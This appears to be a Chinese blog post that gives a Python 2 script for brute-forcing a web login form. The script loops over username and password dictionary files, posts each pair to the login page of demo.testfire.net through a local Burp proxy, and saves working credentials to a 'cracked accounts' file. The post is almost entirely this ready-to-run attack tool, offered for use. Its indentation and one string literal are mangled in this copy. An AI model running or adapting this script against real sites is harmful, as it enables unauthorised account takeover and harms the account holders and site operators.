資訊專欄INFORMATION COLUMN
摘要:導入用戶名字典導入密碼的字典找到個賬號密碼輸入有點丑將就用下
python 的 http 中 urllib2和 urllib模塊在web 表單爆破的使用方法
腳本中還增加了 urllib2和 urllib模塊如何添加代理的方法
# -*- coding: utf-8 -*-
import urllib2
import urllib
import time
def brute_force(user, password):
#strip() 方法用于移除字符串頭尾指定的字符(默認為空格)
name = user.strip()
passwd = password.strip()
#添加代理:本地8080端口的代理是 burp 工具,主要是查看腳本發(fā)包回包的情況,好定位問題
proxy = urllib2.ProxyHandler({"http":"http://127.0.0.1:8080"})
opener = urllib2.build_opener(proxy)
urllib2.install_opener(opener)
#IBM 公司的一個 測試網(wǎng)站
url1 = "http://demo.testfire.net/bank/login.aspx"
user_agent = "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36"
headers = {"User-Agent":user_agent,"Content-Type": "application/x-www-form-urlencoded", "Referer": "http://demo.testfire.net/bank/login.aspx"}
values = {"uid": name, "passw": passwd,"btnSubmit":"Login"}
data = urllib.urlencode(values)#可以把key-value這樣的鍵值對轉(zhuǎn)換成我們想要的格式,返回的是a=1&b=2這樣的字符串
request = urllib2.Request(url1,data,headers)
response = urllib2.urlopen(request)
url2 = response.geturl()
time.sleep(3)
if url2 != url1:
#因為urllib2 返回的頁面如果存在302重定向,返回的頁面是重定向之后的頁面,所以不能以302狀態(tài)碼來判斷是否登錄成功,
#因為重定向之后的頁面訪問成功是200,不是302;所以以返回的頁面是不是發(fā)生變化來判斷是否是否登錄成功。
print "---- find user:", name, " with password:",passwd, "-----"
print url2
outFile.write(name + ":" + passwd+"
" )
else:
print "----- error user:", name, " with password:",passwd, "-----"
print url2
response.close()
return
outFile = open("accounts-cracked.txt", "w")
if __name__ == "__main__":
#導入用戶名字典
with open("user.dic", "r") as userline:
y = userline.readlines()
#導入密碼的字典
with open("pass.dic", "r") as passline:
b= passline.readlines()
for u in y:
for p in b:
brute_force(user=u,password=p)
outFile.close()
with open("accounts-cracked.txt","r") as text:
list = text.readlines()
sum=len(list)
if sum>0:
print "找到",sum,"個賬號密碼"
else:
print "All thread OK,maybe not "
輸入有點丑,將就用下
